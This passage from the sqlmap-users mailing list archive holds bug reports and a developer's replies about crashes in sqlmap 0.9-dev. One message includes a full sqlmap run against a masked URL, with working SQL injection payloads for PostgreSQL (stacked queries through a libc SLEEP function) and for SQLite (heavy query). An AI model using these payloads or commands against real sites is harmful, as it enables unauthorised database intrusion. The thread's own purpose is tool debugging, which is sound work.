https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: <nig...@em...> - 2010-12-17 06:34:50
|
sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b [03:44:42] [INFO] testing connection to the target url [03:44:52] [INFO] testing NULL connection to the target url [03:44:57] [INFO] testing if the url is stable, wait a few seconds [03:45:00] [INFO] url is stable all the tests.... Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y sqlmap identified the following injection points with 10051 HTTP(s) requests: --- Place: GET Parameter: xxx Type: stacked queries Title: PostgreSQL < 8.2 stacked queries (Glibc) Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 Place: Cookie Parameter: app_state Type: stacked queries Title: SQLite > 2.0 stacked queries (heavy query) Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 --- there were multiple injection points, please select the one to use for following injections: [0] place: GET, parameter: xxx, type: Unescaped numeric (default) [1] place: Cookie, parameter: app_state, type: LIKE single quoted string [q] Quit > 0 [07:24:11] [INFO] testing PostgreSQL [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL [07:24:12] [INFO] testing MySQL [07:24:12] [WARNING] the back-end DBMS is not MySQL [07:24:12] [INFO] testing Oracle [07:24:12] [WARNING] the back-end DBMS is not Oracle [07:24:12] [INFO] testing Microsoft SQL Server [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server [07:24:13] [INFO] the back-end DBMS is SQLite [07:24:13] [INFO] fetching banner [07:24:13] [INFO] retrieving the length of query output [07:24:13] [INFO] retrieved: [07:24:16] [INFO] retrieved: [07:24:19] [INFO] testing SQLite [07:24:20] [WARNING] the back-end DBMS is not SQLite [07:24:20] [INFO] testing Microsoft Access [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access [07:24:21] [INFO] testing Firebird [07:24:21] [WARNING] the back-end DBMS is not Firebird [07:24:21] [INFO] testing SAP MaxDB [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB [07:24:22] [INFO] testing Sybase [07:24:22] [WARNING] the back-end DBMS is not Sybase [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 0.9-dev Python version: 2.6.5 Operating system: nt Traceback (most recent call last): File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main start() File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start action() File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) AttributeError: 'NoneType' object has no attribute 'getFingerprint' [*] shutting down at: 07:24:22 |
|
From: Miroslav S. <mir...@gm...> - 2010-12-15 20:51:00
|
thx :) kr On Wed, Dec 15, 2010 at 9:36 PM, ultramegaman <sec...@ul...> wrote: > Self-reply: > in "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 375 > I just changed condition to None, as it's not being used by the > ParseUnionPage function. Easy fix and it's working smoothly now. > > Thanks for the awesome tool guys! > > > On Wed, Dec 15, 2010 at 12:43 PM, ultramegaman > <sec...@ul...> wrote: >> [11:26:50] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry >> your run with the latest development version from the Subversion >> repository. If the exception persists, please send by e-mail to >> sql...@li... the command line, the following >> text and any information needed to reproduce the bug. The developers >> will try to reproduce the bug, fix it accordingly and get back to you. >> sqlmap version: 0.9-dev (r2693) >> Python version: 2.6.5 >> Operating system: posix >> Traceback (most recent call last): >> File "./sqlmap.py", line 79, in main >> start() >> File "/data/ultra/tools/sqlmap-dev/lib/controller/controller.py", >> line 393, in start >> action() >> File "/data/ultra/tools/sqlmap-dev/lib/controller/action.py", line >> 77, in action >> conf.dumper.users(conf.dbmsHandler.getUsers()) >> File "/data/ultra/tools/sqlmap-dev/plugins/generic/enumeration.py", >> line 150, in getUsers >> value = inject.getValue(query, blind=False, error=False) >> File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 416, >> in getValue >> value = __goInband(query, expected, sort, resumeValue, unpack, dump) >> File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 375, >> in __goInband >> data = parseUnionPage(output, expression, partial, condition, sort) >> NameError: global name 'condition' is not defined >> >> >> Please let me know if more information is required. >> > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
|
From: ultramegaman <sec...@ul...> - 2010-12-15 20:43:00
|
Self-reply: in "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 375 I just changed condition to None, as it's not being used by the ParseUnionPage function. Easy fix and it's working smoothly now. Thanks for the awesome tool guys! On Wed, Dec 15, 2010 at 12:43 PM, ultramegaman <sec...@ul...> wrote: > [11:26:50] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry > your run with the latest development version from the Subversion > repository. If the exception persists, please send by e-mail to > sql...@li... the command line, the following > text and any information needed to reproduce the bug. The developers > will try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 0.9-dev (r2693) > Python version: 2.6.5 > Operating system: posix > Traceback (most recent call last): > File "./sqlmap.py", line 79, in main > start() > File "/data/ultra/tools/sqlmap-dev/lib/controller/controller.py", > line 393, in start > action() > File "/data/ultra/tools/sqlmap-dev/lib/controller/action.py", line > 77, in action > conf.dumper.users(conf.dbmsHandler.getUsers()) > File "/data/ultra/tools/sqlmap-dev/plugins/generic/enumeration.py", > line 150, in getUsers > value = inject.getValue(query, blind=False, error=False) > File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 416, > in getValue > value = __goInband(query, expected, sort, resumeValue, unpack, dump) > File "/data/ultra/tools/sqlmap-dev/lib/request/inject.py", line 375, > in __goInband > data = parseUnionPage(output, expression, partial, condition, sort) > NameError: global name 'condition' is not defined > > > Please let me know if more information is required. > |
48 messages has been excluded from this view by a project administrator.
